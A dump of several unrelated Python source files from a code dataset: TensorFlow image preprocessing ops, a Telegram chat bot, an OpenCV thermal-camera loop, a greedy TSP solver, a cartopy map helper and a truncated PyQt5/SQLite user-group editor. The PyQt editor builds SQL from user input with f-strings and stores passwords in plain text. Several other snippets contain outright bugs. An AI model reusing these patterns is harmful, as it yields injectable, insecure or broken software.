outdefault=\"labels\")\ndef get_nyu_depth():\n \"\"\"Preprocesses NYU depth data.\"\"\"\n def _pp(depth):\n return tf.expand_dims(tf.cast(depth, tf.float32), -1)\n return _pp\n\n\n@Registry.register(\"preprocess_ops.coco_panoptic\")\ndef get_coco_panoptic_pp():\n \"\"\"COCO-panoptic: produces a mask with labels and a mask with instance ids.\n\n Instance channel will have values between 1 and N, and -1 for non-annotated\n pixels.\n\n Returns:\n COCO panoptic preprocessign op.\n \"\"\"\n def _coco_panoptic(data):\n instance_ids = tf.cast(data[\"panoptic_objects\"][\"id\"], tf.int32)\n instance_labels = tf.cast(data[\"panoptic_objects\"][\"label\"], tf.int32)\n\n # Convert image with ids split in 3 channels into a an integer id.\n id_mask = tf.einsum(\n \"hwc,c->hw\",\n tf.cast(data[\"panoptic_image\"], tf.int32),\n tf.constant([1, 256, 256**2], tf.int32))\n\n # Broadcast into N boolean masks one per instance_id.\n n_masks = tf.cast(\n id_mask[:, :, None] == instance_ids[None, None, :], tf.int32)\n\n # Merge into a semantic and an instance id mask.\n # Note: pixels which do not belong to any mask, will have value=-1\n # which creates an empty one_hot masks.\n # Number instances starting at 1 (0 is treated specially by make_canonical).\n instance_idx = tf.range(tf.shape(instance_ids)[-1])\n instances = tf.einsum(\"hwc,c->hw\", n_masks, instance_idx + 1)\n semantics = tf.einsum(\"hwc,c->hw\", n_masks, instance_labels + 1)\n\n data[\"instances\"] = instances[:, :, None]\n data[\"semantics\"] = semantics[:, :, None]\n return data\n\n return _coco_panoptic\n\n\n@Registry.register(\"preprocess_ops.make_canonical\")\n@utils.InKeyOutKey(indefault=\"labels\", outdefault=\"labels\")\ndef get_make_canonical(random=False, main_sort_axis=\"y\"):\n \"\"\"Makes id mask ordered from left to right based on the center of mass.\"\"\"\n # By convention, instances are in the last channel.\n def _make_canonical(image):\n \"\"\"Op.\"\"\"\n instimg = image[..., -1]\n\n # Compute binary instance masks. Note, we do not touch 0 and neg. ids.\n ids = tf.unique(tf.reshape(instimg, [-1])).y\n ids = ids[ids > 0]\n n_masks = tf.cast(\n instimg[None, :, :] == ids[:, None, None], tf.int32)\n\n if not random:\n f = lambda x: tf.reduce_mean(tf.cast(tf.where(x), tf.float32), axis=0)\n centers = tf.map_fn(f, tf.cast(n_masks, tf.int64), dtype=tf.float32)\n centers = tf.reshape(centers, (tf.shape(centers)[0], 2))\n major = {\"y\": 0, \"x\": 1}[main_sort_axis]\n perm = tf.argsort(\n centers[:, 1 - major] +\n tf.cast(tf.shape(instimg)[major], tf.float32) * centers[:, major])\n n_masks = tf.gather(n_masks, perm)\n else:\n n_masks = tf.random.shuffle(n_masks)\n\n idx = tf.range(tf.shape(ids)[0])\n can_mask = tf.einsum(\"chw,c->hw\", n_masks, idx + 2) - 1\n # Now, all 0 and neg. ids have collapsed to -1. Thus, we recover 0 id from\n # the original mask.\n can_mask = tf.where(instimg == 0, 0, can_mask)\n return tf.concat([image[..., :-1], can_mask[..., None]], axis=-1)\n\n return _make_canonical\n\n\n@Registry.register(\"preprocess_ops.inception_box\")\ndef get_inception_box(\n *, area=(0.05, 1.0), aspect=(0.75, 1.33), min_obj_cover=0.0,\n outkey=\"box\", inkey=\"image\"):\n \"\"\"Creates an inception style bounding box which can be used to crop.\"\"\"\n def _inception_box(data):\n _, _, box = tf.image.sample_distorted_bounding_box(\n tf.shape(data[inkey]),\n area_range=area,\n aspect_ratio_range=aspect,\n min_object_covered=min_obj_cover,\n bounding_boxes=(data[\"objects\"][\"bbox\"][None, :, :]\n if min_obj_cover else tf.zeros([0, 0, 4])),\n use_image_if_no_bounding_boxes=True)\n # bbox is [[[y0,x0,y1,x1]]]\n data[outkey] = (box[0, 0, :2], box[0, 0, 2:] - box[0, 0, :2])\n return data\n return _inception_box\n\n\n@Registry.register(\"preprocess_ops.crop_box\")\n@utils.InKeyOutKey(with_data=True)\ndef get_crop_box(*, boxkey=\"box\"):\n \"\"\"Crops an image according to bounding box in `boxkey`.\"\"\"\n def _crop_box(image, data):\n shape = tf.shape(image)[:-1]\n begin, size = data[boxkey]\n begin = tf.cast(begin * tf.cast(shape, tf.float32), tf.int32)\n size = tf.cast(size * tf.cast(shape, tf.float32), tf.int32)\n begin = tf.concat([begin, tf.constant((0,))], axis=0)\n size = tf.concat([size, tf.constant((-1,))], axis=0)\n crop = tf.slice(image, begin, size)\n # Unfortunately, the above operation loses the depth-dimension. So we need\n # to restore it the manual way.\n crop.set_shape([None, None, image.shape[-1]])\n return crop\n return _crop_box\n\n\n@Registry.register(\"preprocess_ops.randu\")\ndef get_randu(key):\n \"\"\"Creates a random uniform float [0, 1) in `key`.\"\"\"\n def _randu(data):\n data[key] = tf.random.uniform([])\n return data\n return _randu\n\n\n@Registry.register(\"preprocess_ops.det_fliplr\")\n@utils.InKeyOutKey(with_data=True)\ndef get_det_fliplr(*, randkey=\"fliplr\"):\n \"\"\"Flips an image horizontally based on `randkey`.\"\"\"\n # NOTE: we could unify this with regular flip when randkey=None.\n def _det_fliplr(orig_image, data):\n flip_image = tf.image.flip_left_right(orig_image)\n flip = tf.cast(data[randkey] > 0.5, orig_image.dtype)\n return flip_image * flip + orig_image * (1 - flip)\n return _det_fliplr\n\n\n@Registry.register(\"preprocess_ops.strong_hash\")\n@utils.InKeyOutKey(indefault=\"tfds_id\", outdefault=\"tfds_id\")\ndef get_strong_hash():\n \"\"\"Preprocessing that hashes a string.\"\"\"\n def _strong_hash(string):\n return tf.strings.to_hash_bucket_strong(\n string,\n np.iinfo(int).max, [3714561454027272724, 8800639020734831960])\n return _strong_hash\n","repo_name":"google-research/big_vision","sub_path":"big_vision/pp/proj/uvim/pp_ops.py","file_name":"pp_ops.py","file_ext":"py","file_size_in_byte":6938,"program_lang":"python","lang":"en","doc_type":"code","stars":1152,"dataset":"github-code","pt":"77"} +{"seq_id":"15546991541","text":"finEntrada = False\nnombres = []\n\ndef licitacion(*nombres, equipo):\n print(\"equipo \" + equipo + \" :\")\n if(len(*nombres)==0):\n print(\"sin Jugadores\")\n else:\n for c in nombres:\n print(\"\\t\" + str(c))\n\nwhile(finEntrada == False):\n print(\"Escriba 0 si ya no desea incorporar mas jugadores\")\n if(input()=='0'):\n finEntrada =True\n break\n print(\"introduzca un miembro y pulse enter\")\n nombres.append(input())\n\n\n\n\nlicitacion(nombres, equipo=\"buff\")\n","repo_name":"paulatw20/PythonSh","sub_path":"Funciones/funciones2.py","file_name":"funciones2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19066722038","text":"#!/usr/bin/env python\n\n\"\"\"\nCV2 video capture example from Pure Thermal 1\n\"\"\"\n\ntry:\n import cv2\nexcept ImportError:\n print(\"ERROR python-opencv must be installed\")\n exit(1)\n\nclass OpenCvCapture(object):\n \"\"\"\n Encapsulate state for capture from Pure Thermal 1 with OpenCV\n \"\"\"\n\n def __init__(self):\n cv2_cap = cv2.VideoCapture(0)\n if cv2_cap.isOpened():\n print(\"Thermal Camera Found\")\n if not cv2_cap.isOpened():\n print(\"Thermal Camera not found!\")\n exit(1)\n\n self.cv2_cap = cv2_cap\n\n def show_video(self):\n \"\"\"\n Run loop for cv2 capture from lepton\n \"\"\"\n cv2.namedWindow(\"lepton\", cv2.WINDOW_NORMAL)\n print(\"Running, ESC or Ctrl-c to exit...\")\n while True:\n ret, img = self.cv2_cap.read()\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n #_, binary = cv2.threshold(img, 88, 255, cv2.THRESH_BINARY)\n #im3 = cv2.bitwise_and(img, binary)\n #im3[binary == 0] = 0\n blur = cv2.GaussianBlur(img, (5,5),cv2.BORDER_DEFAULT)\n canny = cv2.Canny(blur, 10, 50)\n contours = cv2.findContours(canny, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[0]\n cnt = contours[4]\n cv2.drawContours()\n\n if ret == False:\n print(\"Error reading image\")\n break\n\n cv2.imshow(\"lepton\", cv2.resize(img, (640, 480)))\n if cv2.waitKey(5) == 27:\n break\n\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n OpenCvCapture().show_video()\n","repo_name":"maykef/DIY_Fluorometer","sub_path":"archive/opencv_capture_thermal.py","file_name":"opencv_capture_thermal.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14804153419","text":"# -*- coding: utf-8 -*-\n'''\nCreated on Oct 22, 2017\n\n@author: Administrator\n'''\n\nimport telebot\nimport config\nimport csv\nimport time\nimport datetime\nimport logging\n\n# bot plugins\nimport start\n# import temperature\nimport audio\nimport sotd_song\n# import cotd_plugin\nimport announce\nimport roll\nimport webcomics\nimport slap_plugin\nimport likezor_plugin\nimport btc_plugin\nimport yankovic_plugin\nimport rip_plugin\nimport mini_project_number_guess\nimport mini_project_magic_ball\nimport mini_project_hangman\n\ncommands = { # command description used in the \"help\" command\n 'start': 'Get used to the bot',\n 'help': 'Gives you information about the available commands',\n # 'temperature': 'Shows current temperature in my kitchen',\n 'guess': 'Числовая угадайка',\n 'ball': 'Магический шар',\n 'hangman': 'Игра в Виселицу',\n 'song': 'A random song from the database',\n 'song [username] ': 'A list of songs submitted by [username], i.e. /song username 3',\n 'sotd': 'Links a song of the day',\n # 'cotd': 'Cartoon of the day',\n 'smbc': 'Recent Saturday Morning Breakfast Cereal (SMBC)',\n 'xkcd': 'Recent XKCD',\n 'phd': 'Recent PhD comic',\n 'dilbert': 'Recent Dilbert by Scott Adams',\n 'dino': 'Recent Dinosaur Comic',\n 'calvin': 'Random Calvin and Hobbes by Bill Watterson',\n 'announce': 'Check daily announcements',\n 'slap [target]': 'Slap somebody',\n 'roll [nDr]': 'Roll a dice in nDr format, i.e. /roll 3d8',\n 'btc [delta]': 'Average USD market price historical chart across major bitcoin exchanges over delta, which can be either day or week or month or year, i.e. /btc week or just /btc to get current price',\n 'weirdal': 'Random Weird Al Yankovic music video.',\n 'rip [youtube url] ': 'Rip an .mp3 file from youtube and optionally add it to database',\n 'likezor [download] ': 'Download likes of a Twitter user, i.e. /likezor download gaestlic'\n}\n\n\n# Keyboard = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)\n# Keyboard.add('')\n# hideKeyboard = types.ReplyKeyboardRemove() # if sent as reply_markup, will hide the keyboard\n\n# logger = telebot.logger\n# telebot.logger.setLevel(logging.DEBUG) # Outputs debug messages to console\n\n\n# telebot.apihelper.proxy = {\n# 'https':'socks5://{}:{}'.format(config.ip,config.port)\n# }\n\ndef listener(messages):\n \"\"\"\n When new messages arrive TeleBot will call this function.\n \"\"\"\n for message in messages:\n if message.content_type == 'text':\n # print the sent message to the console\n if message.chat.type == 'private':\n if message.chat.username:\n print(message.chat.username + \" [\" + str(message.chat.id) + \"]: \" + message.text)\n else:\n print(message.chat.first_name + \" [\" + str(message.chat.id) + \"]: \" + message.text)\n else:\n print(message.chat.title + \" [\" + str(message.chat.id) + \"]: \" + message.text)\n\n\nbot = telebot.TeleBot(config.token)\nbot.remove_webhook()\nbot.set_update_listener(listener) # register listener\n\n\n# handle the \"/start\" command\n@bot.message_handler(commands=['start'])\ndef handle_start_help(message):\n start.handle_start_help(bot, message)\n\n\n# help page\n@bot.message_handler(commands=['help'])\ndef command_help(message):\n help_text = \"The following commands are available: \\n\"\n for key in commands: # generate help text out of the commands dictionary defined at the top\n help_text += \"/\" + key + \": \"\n help_text += commands[key] + \"\\n\"\n bot.send_message(message.chat.id, help_text) # send the generated help page\n\n\n# @bot.message_handler(commands=['temperature'])\n# @bot.message_handler(func=lambda message: message.text == 'Temperature')\n# def handle_temperature(message):\n# temperature.handle_temperature(bot, message)\n\nfrom slippy_bot import bot\n\n\n@bot.message_handler(content_types=['audio'])\ndef handle_drop_audio(message):\n audio.handle_drop_audio(bot, message)\n\n\n@bot.message_handler(func=lambda message: message.text == 'SOTD')\n@bot.message_handler(commands=['sotd'])\ndef sotd(message):\n sotd_song.sotd(bot, message)\n\n\n@bot.message_handler(func=lambda message: message.text == 'Song')\n@bot.message_handler(commands=['song'])\ndef song(message):\n sotd_song.song(bot, message)\n\n\n# @bot.message_handler(commands=['cotd'])\n# def cotd(message):\n# cotd_plugin.handle_cotd(bot, message)\n\n\n@bot.message_handler(commands=['announce'])\ndef announce_command(message):\n announce.announce_command(bot, message)\n\n\n@bot.message_handler(commands=['roll'])\ndef dice(message):\n roll.dice(bot, message)\n\n\n@bot.message_handler(commands=['smbc'])\ndef smbc(message):\n webcomics.smbc(bot, message)\n\n\n@bot.message_handler(commands=['calvin'])\ndef calvin(message):\n webcomics.calvin(bot, message)\n\n\n@bot.message_handler(commands=['xkcd'])\ndef xkcd(message):\n webcomics.xkcd(bot, message)\n\n\n@bot.message_handler(commands=['dilbert'])\ndef dilbert(message):\n webcomics.dilbert(bot, message)\n\n\n@bot.message_handler(commands=['phd'])\ndef phd(message):\n webcomics.phd(bot, message)\n\n\n@bot.message_handler(commands=['dino'])\ndef dino(message):\n webcomics.dinosaur(bot, message)\n\n\n@bot.message_handler(commands=['slap'])\ndef slap(message):\n slap_plugin.slap(bot, message)\n\n\n@bot.message_handler(commands=['likezor'])\ndef likezor(message):\n likezor_plugin.likezor(bot, message)\n\n\n@bot.message_handler(commands=['btc'])\ndef btc(message):\n btc_plugin.btc(bot, message)\n\n\n@bot.message_handler(commands=['weirdal'])\n# http://pantuts.com/2013/02/16/youparse-extract-urls-from-youtube/\ndef yankovic(message):\n yankovic_plugin.yankovic(bot, message)\n\n\n@bot.message_handler(commands=['rip'])\n# https://stackoverflow.com/questions/27473526/download-only-audio-from-youtube-video-using-youtube-dl-in-python-script \ndef rip(message):\n rip_plugin.rip(bot, message)\n\n\n@bot.message_handler(commands=['guess'])\ndef guess(message):\n mini_project_number_guess.guess(bot, message)\n\n\n@bot.message_handler(commands=['ball'])\ndef ball(message):\n mini_project_magic_ball.ball(bot, message)\n\n\n@bot.message_handler(commands=['hangman'])\ndef hangman(message):\n mini_project_hangman.play_hangman(bot, message)\n\n\n@bot.message_handler(content_types=['document'])\ndef handle_docs_audio(message):\n # bot.reply_to(message, \"Sorry, I don't work with documents.\")\n pass\n\n\n# default handler for every other text\n@bot.message_handler(func=lambda message: True, content_types=['text'])\ndef command_default(m):\n # this is the standard reply to a normal message\n # bot.send_message(m.chat.id, \"I don't understand \\\"\" + m.text + \"\\\"\\nMaybe try the help page at /help\")\n pass\n\n\n@bot.message_handler(func=lambda msg: msg.text == u'\\U0001F4A9')\ndef set_ro(message):\n bot.send_message(message.chat.id, \"Sorry, no shit posting.\", reply_to_message_id=message.message_id)\n bot.restrict_chat_member(message.chat.id, message.from_user.id, until_date=time.time() + 31)\n\n\ndef telegram_polling():\n \"\"\"\n https://github.com/eternnoir/pyTelegramBotAPI/issues/206\n https://github.com/eternnoir/pyTelegramBotAPI/issues/401\n \"\"\"\n try:\n bot.polling(none_stop=True, timeout=100) # constantly get messages from Telegram\n except Exception as err:\n logging.error(err)\n bot.stop_polling()\n print(\"Internet error!\")\n time.sleep(10)\n telegram_polling()\n\n\nif __name__ == '__main__':\n telegram_polling()\n","repo_name":"a-maksimov/Sleepy_bot","sub_path":"slippy_bot.py","file_name":"slippy_bot.py","file_ext":"py","file_size_in_byte":7562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25051547021","text":"import numpy as np\nfrom math import sqrt\n\n\ndef calc_dist(x1: float, y1: float, x2: float, y2: float):\n return sqrt((x1-x2)**2 + (y1-y2)**2)\n\n\n# def find_min(ind, data): # to zakomentowane to raczej zle xD\n# for index in range(len(data)):\n# if not np.array_equal(data[ind], data[index]):\n# tmp_min = calc_dist(data[ind][0], data[ind][1], data[index][0], data[index][1])\n# tmp_index = index\n# break\n# for index in range(len(data)):\n# next_min = calc_dist(data[ind][0], data[ind][1], data[index][0], data[index][1])\n# if next_min < tmp_min and next_min != 0:\n# tmp_min = next_min\n# tmp_index = index\n# return tmp_min, tmp_index\n#\n#\n# def main(data):\n# dist = 0\n# current_pos = 0\n# while len(data) > 1:\n# to_add, current_pos = find_min(current_pos, data)\n# dist += to_add\n# data = np.delete(data, current_pos, axis=0)\n# return dist\ndef find_min(curr_pnt, data, vis):\n for index in range(len(data)):\n if not np.array_equal(data[curr_pnt], data[index]) and index not in vis:\n tmp_min = calc_dist(data[curr_pnt][0], data[curr_pnt][1], data[index][0], data[index][1])\n tmp_index = index\n break\n for index in range(len(data)):\n next_min = calc_dist(data[curr_pnt][0], data[curr_pnt][1], data[index][0], data[index][1])\n if index not in vis and tmp_min > next_min > 0:\n tmp_min = next_min\n tmp_index = index\n return tmp_min, tmp_index\n\n\ndef main(data):\n pos = 0\n dist = 0\n vis = set()\n vis.add(pos)\n path = [pos+1]\n coordinates = [data[pos]]\n while len(vis) < len(data):\n to_add, pos = find_min(pos, data, vis)\n dist += to_add\n vis.add(pos)\n path.append(pos+1)\n coordinates.append(data[pos])\n dist += calc_dist(data[0][0], data[0][1], data[pos][0], data[pos][1])\n path.append(path[0])\n coordinates.append(data[0])\n coordinates = np.array(coordinates)\n coordinates = np.transpose(coordinates)\n return dist, path, coordinates\n\n\nif __name__ == \"__main__\":\n cities = np.array([[1, 1], [2, 2], [3, 3], [4, 4], [5, 5]], dtype=np.float32)\n print(main(cities))\n","repo_name":"justdodo27/TSP-python","sub_path":"greedy.py","file_name":"greedy.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28034869930","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nODell_udf.py\n python script of functions written by me or by others passed on to me\nCreated on Wed Sep 8 09:09:22 2021\n@author: kodell\n\"\"\"\n#%% packages needed\nimport numpy as np\nimport cartopy.feature as cfeature\nimport cartopy.crs as ccrs\nimport cartopy.io.shapereader as shpreader\nimport matplotlib.pyplot as plt\nimport matplotlib as mplt\nfrom matplotlib import colors\nmplt.rcParams['font.size'] = '14'\nmplt.rcParams['font.family'] = 'sans-serif'\n#mplt.rcParams['font.sans-serif'] = 'Veranda'\n#%% make a basic map of the US using cartopy, written by Katelyn O'Dell\n# NOTE this assumes a PlateCaree projection\ndef plt_map(dlon,dlat,data,cmap,clabel,title,**kwargs):\n vlim = kwargs.get('clim', None)\n outpath = kwargs.get('outname',None)\n vpts = kwargs.get('cpts',None)\n multi = kwargs.get('multi',None)\n if multi:\n nd = len(data)\n fig, axarr = plt.subplots(nrows=multi[0],ncols=multi[1],subplot_kw={'projection': ccrs.PlateCarree()},\n figsize=(11,8.5))\n axarr = axarr.flatten()\n for di in range(nd):\n ax = axarr[di]\n ax.patch.set_visible(False)\n # plot shapfile with colors\n ax.add_feature(cfeature.LAND.with_scale('50m'),facecolor='gray',alpha=0.5)\n ax.add_feature(cfeature.OCEAN.with_scale('50m'))\n ax.add_feature(cfeature.STATES.with_scale('50m'),edgecolor='lightgray')\n ax.outline_patch.set_edgecolor('white')\n if vlim:\n cs = ax.scatter(dlon,dlat,c=data[di],s=1,#shading='nearest',\n transform=ccrs.PlateCarree(),cmap=cmap[di],vmin=vlim[di][0],vmax=vlim[di][1])\n elif vpts:\n divnorm=colors.TwoSlopeNorm(vmin=vpts[di][0], vcenter=vpts[di][1], vmax=vpts[di][2])\n cs = ax.scatter(dlon,dlat,c=data[di],s=1,#shading='nearest',\n transform=ccrs.PlateCarree(),cmap=cmap[di],norm=divnorm)\n else:\n cs = ax.scatter(dlon,dlat,c=data[di],s=1,#shading='nearest',\n transform=ccrs.PlateCarree(),cmap=cmap[di])\n cbar = fig.colorbar(cs,ax=ax,orientation='horizontal',pad=0,shrink=0.6)\n #cbar = fig.colorbar(cs,ax=ax,orientation='vertical',pad=0,shrink=0.5)\n cbar.set_label(label=clabel[di],size=16)\n ax.set_title(title[di],fontsize=18)\n plt.tight_layout()\n else: \n fig, ax = plt.subplots(nrows=1,ncols=1,\n subplot_kw={'projection': ccrs.PlateCarree()},\n figsize=(11,8.5))\n ax.patch.set_visible(False)\n # plot shapfile with colors\n ax.add_feature(cfeature.LAND.with_scale('50m'),facecolor='gray',alpha=0.5)\n ax.add_feature(cfeature.OCEAN.with_scale('50m'))\n ax.add_feature(cfeature.STATES.with_scale('50m'),edgecolor='lightgray')\n ax.outline_patch.set_edgecolor('white')\n if vlim:\n cs = ax.scatter(dlon,dlat,c=data,s=10,#shading='nearest',\n transform=ccrs.PlateCarree(),cmap=cmap,vmin=vlim[0],vmax=vlim[1])\n elif vpts:\n divnorm=colors.TwoSlopeNorm(vmin=vpts[0], vcenter=vpts[1], vmax=vpts[2])\n cs = ax.scatter(dlon,dlat,c=data,s=10,#shading='nearest',\n transform=ccrs.PlateCarree(),cmap=cmap,norm=divnorm)\n else:\n cs = ax.scatter(dlon,dlat,c=data,s=10,#shading='nearest',\n transform=ccrs.PlateCarree(),cmap=cmap)\n #cbar = fig.colorbar(cs,ax=ax,orientation='vertical',pad=0,shrink=0.7)\n cbar = fig.colorbar(cs,ax=ax,orientation='vertical',pad=0,shrink=0.5)\n cbar.set_label(label=clabel,size=16)\n ax.set_title(title,fontsize=18)\n plt.tight_layout()\n\n if outpath:\n plt.savefig(outpath)\n plt.show()\n","repo_name":"kaodell/Sandberg_CDC_smokePM","sub_path":"ODell_udf_CDCprj.py","file_name":"ODell_udf_CDCprj.py","file_ext":"py","file_size_in_byte":3923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44945272592","text":"# Подключаем необходимые библиотеки\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import pyqtSlot, Qt\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtSql import *\nimport mainwindow_ui as ui\n\n# Класс главного окна\n# Наследуется от базового класса QMainWindow\nclass MainWindow(QMainWindow):\n\t# Конструктор\n\tdef __init__(self):\n\t\t# Вызываем конструктор базового класса\n\t\tsuper(MainWindow, self).__init__()\n\t\t# Создаем экземпляр класса окна из ui файла\n\t\tself.ui = ui.Ui_MainWindow()\n\t\t# Устанавливаем окно на текущую форму\n\t\tself.ui.setupUi(self)\n\t\t# Задаём переменную для работы с БД по умолчанию пустой\n\t\tself.db = None\n\t\t# Создаем лист для Id удаленных элементов\n\t\tself.remove = []\n\t\t# Создаем лист для Id пользователей\n\t\tself.userId = []\n\n\t\n\t# Инициализируем подключение БД в локальную переменную\n\t# dbName - Путь к БД\n\t# Если всё корректно - возвращает True\n\tdef prepareDatabase(self, dbName):\n\t\tself.db = QSqlDatabase.addDatabase('QSQLITE', 'db')\n\t\tself.db.setDatabaseName(dbName)\n\t\t\n\t\tif not self.db.open():\n\t\t\tQMessageBox.critical(self, 'Ошибка', 'Не удалось подключиться к БД:\\n' + self.db.lastError().text())\n\t\t\treturn False\n\t\treturn True\n\t\n\t# Задание списка таблиц из БД вручную\n\tdef showTables(self):\n\t\tfor i in range(3):\n\t\t\tself.ui.tableWidget.removeRow(i)\n\t\t\tself.ui.tableWidget.insertRow(i)\n\t\tusers = QTableWidgetItem('Пользователи')\n\t\tusers.setData(Qt.UserRole, ['users', True])\n\t\tself.ui.tableWidget.setItem(0,0,users)\n\t\tusers.setFlags(Qt.ItemIsSelectable|Qt.ItemIsEnabled)\n\t\t\n\t\tgroups = QTableWidgetItem('Группы')\n\t\tgroups.setData(Qt.UserRole, ['groups', True])\n\t\tself.ui.tableWidget.setItem(1,0,groups)\n\t\tgroups.setFlags(Qt.ItemIsSelectable|Qt.ItemIsEnabled)\n\t\t\n\t\tuserGroups = QTableWidgetItem('Пользователи-группы')\n\t\tuserGroups.setData(Qt.UserRole, ['user_groups', False])\n\t\tself.ui.tableWidget.setItem(2,0,userGroups)\n\t\tuserGroups.setFlags(Qt.ItemIsSelectable|Qt.ItemIsEnabled)\n\t\t\n\t# Обработчик кнопки создания БД\n\t@pyqtSlot()\n\tdef on_actionCreateDB_triggered(self):\n\t\tname = QFileDialog.getSaveFileName(self, 'Выберите файл БД для создания','', 'SQLite database (*.sqlite)')[0]\n\t\tif not name:\n\t\t\treturn\n\t\tif not self.prepareDatabase(name):\n\t\t\treturn\n\t\t\n\t\tquery = QSqlQuery(self.db)\n\t\t\n\t\tqStr = ['''CREATE TABLE users(\n\t\t\tid INTEGER PRIMARY KEY AUTOINCREMENT,\n\t\t\tname VARCHAR,\n\t\t\tpassword VARCHAR\n\t\t)''',\n\t\t\n\t\t'''CREATE TABLE groups (\n\t\t\tid INTEGER PRIMARY KEY AUTOINCREMENT,\n\t\t\tname VARCHAR\n\t\t);''',\n\t\t\n\t\t'''CREATE TABLE user_groups(\n\t\t\tuser_id INTEGER CONSTRAINT user_id_fk REFERENCES users(id) ON DELETE CASCADE,\n\t\t\tgroup_id INTEGER CONSTRAINT group_id_fk REFERENCES groups(id) ON DELETE CASCADE\n\t\t);\n\t\t''']\n\t\t\n\t\tfor str in qStr:\n\t\t\tif not query.exec(str):\n\t\t\t\tQMessageBox.critical(self, 'Ошибка', 'Не удалось создать БД:\\n' + query.lastError().text())\n\t\t\t\treturn\n\t\t\t\n\t\tself.showTables()\n\t\t\n\t# Обработчик кнопки открытия БД\n\t@pyqtSlot()\n\tdef on_actionOpenDB_triggered(self):\n\t\tname = QFileDialog.getOpenFileName(self, 'Выберите файл БД','', 'SQLite database (*.sqlite)')[0]\n\t\tif not name:\n\t\t\treturn\n\t\tif not self.prepareDatabase(name):\n\t\t\treturn\n\t\tself.showTables()\n\t\t\n\t# Обработчик кнопки добавления записи\n\t@pyqtSlot()\n\tdef on_actionAdd_triggered(self):\t\n\t\tlastStr = self.ui.twSimple.rowCount()\n\t\tself.ui.twSimple.insertRow(lastStr)\n\t\tself.ui.twSimple.setItem(lastStr, 0, QTableWidgetItem(''))\n\t\tself.ui.twSimple.item(lastStr, 0).setData(Qt.UserRole, 0)\n\n\t\t\n\t# Обработчик кнопки удаления записи\n\t@pyqtSlot()\n\tdef on_actionDelete_triggered(self):\n\t\tif self.ui.twSimple.currentRow() >= 0:\n\t\t\titem = self.ui.twSimple.currentRow()\n\t\t\tidC = self.ui.twSimple.item(item, 0).data(Qt.UserRole)\n\t\t\tif idC != 0:\n\t\t\t\tself.remove.append(idC)\n\t\t\tself.ui.twSimple.removeRow(item)\n\n\t# Обработчик кнопки сохранения\n\t@pyqtSlot()\n\tdef on_actionSave_triggered(self):\n\t\tif self.ui.tableWidget.currentRow() == 0 or self.ui.tableWidget.currentRow() == 1:\n\t\t\tif self.ui.tableWidget.currentRow() == 0:\n\t\t\t\tself.deleteFromTable(\"users\")\n\t\t\tif self.ui.tableWidget.currentRow() == 1:\n\t\t\t\tself.deleteFromTable(\"groups\")\n\t\t\tself.updateTable()\n\t\tif self.ui.tableWidget.currentRow() == 2:\n\t\t\tself.removeFromTable()\n\t\t\tself.insertToTableUserGroups()\n\t\tQMessageBox.information(self, 'Успешно', 'Сохранено')\n\t# Удаление элементов из таблицы пользователи-группы\n\tdef removeFromTable(self):\n\t\tquery = QSqlQuery(self.db)\n\t\tfor c in self.remove:\n\t\t\tif not query.exec(f'DELETE FROM user_groups WHERE group_id = {self.ui.twMain.item(self.ui.twMain.currentRow(), 0).data(Qt.UserRole)} AND user_id = {c}'):\n\t\t\t\tQMessageBox.critical(self, 'Ошибка', 'Не удалось удалить строку:\\n' + query.lastError().text())\n\t\t\t\treturn\n\n\t# Проверка элементов на добавление в таблицу пользователи-группы\n\tdef insertToTableUserGroups(self):\n\t\tfor i in range(self.ui.twListInMain.rowCount()):\n\t\t\tif self.ui.twListInMain.item(i, 0).data(Qt.UserRole) == 0:\n\t\t\t\tself.insertToTableUserGroupsProcess(i)\n\n\t# Добавление элементов в список пользователи-группы\n\tdef insertToTableUserGroupsProcess(self, i):\n\t\tquery = QSqlQuery(self.db)\n\t\tgroup = self.ui.twMain.item(self.ui.twMain.currentRow(),0).data(Qt.UserRole)\n\t\tuserName = self.ui.twListInMain.item(i,0).text()\n\t\tqStr = f'INSERT INTO user_groups(user_id, group_id) VALUES((SELECT id FROM users WHERE name=\"{userName}\"),{group})'\n\t\tif not query.exec(qStr):\n\t\t\tQMessageBox.critical(self, 'Ошибка', 'Не удалось добавить строку:\\n' + query.lastError().text())\n\t\t\treturn\n\t\tself.getLastIdUserGroups(i)\n\n\t# Удаление элементов из таблицы\n\tdef deleteFromTable (self, table):\n\t\tquery = QSqlQuery(self.db)\n\t\tfor c in self.remove:\n\t\t\tif not query.exec(f'DELETE FROM {table} WHERE id = {c}'):\n\t\t\t\tQMessageBox.critical(self, 'Ошибка', 'Не удалось удалить строку:\\n' + query.lastError().text())\n\t\t\t\treturn\n\t\n\t# Добавление в таблицу пользователи\n\tdef insertToTableUsers (self, i):\n\t\tquery = QSqlQuery(self.db)\n\t\tif self.ui.twSimple.item(i ,0).text() and self.ui.twSimple.item(i ,1).text():\n\t\t\tname = self.ui.twSimple.item(i ,0).text()\n\t\t\tpassword = self.ui.twSimple.item(i ,1).text()\n\t\t\tqStr = f\"INSERT INTO users(name, password) VALUES('{name}','{password}')\"\n\t\t\tif not query.exec(qStr):\n\t\t\t\tQMessageBox.critical(self, 'Ошибка', 'Не удалось добавить строку:\\n' + query.lastError().text())\n\t\t\t\treturn\n\t\t\tself.getLastId(i)\n\n\t# Добавление в таблицу группы\n\tdef insertToTableGroups (self, i):\n\t\tquery = QSqlQuery(self.db)\n\t\tif self.ui.twSimple.item(i ,0).text():\n\t\t\tname = self.ui.twSimple.item(i ,0).text()\n\t\t\tqStr = f\"INSERT INTO groups(name) VALUES('{name}')\"\n\t\t\tif not 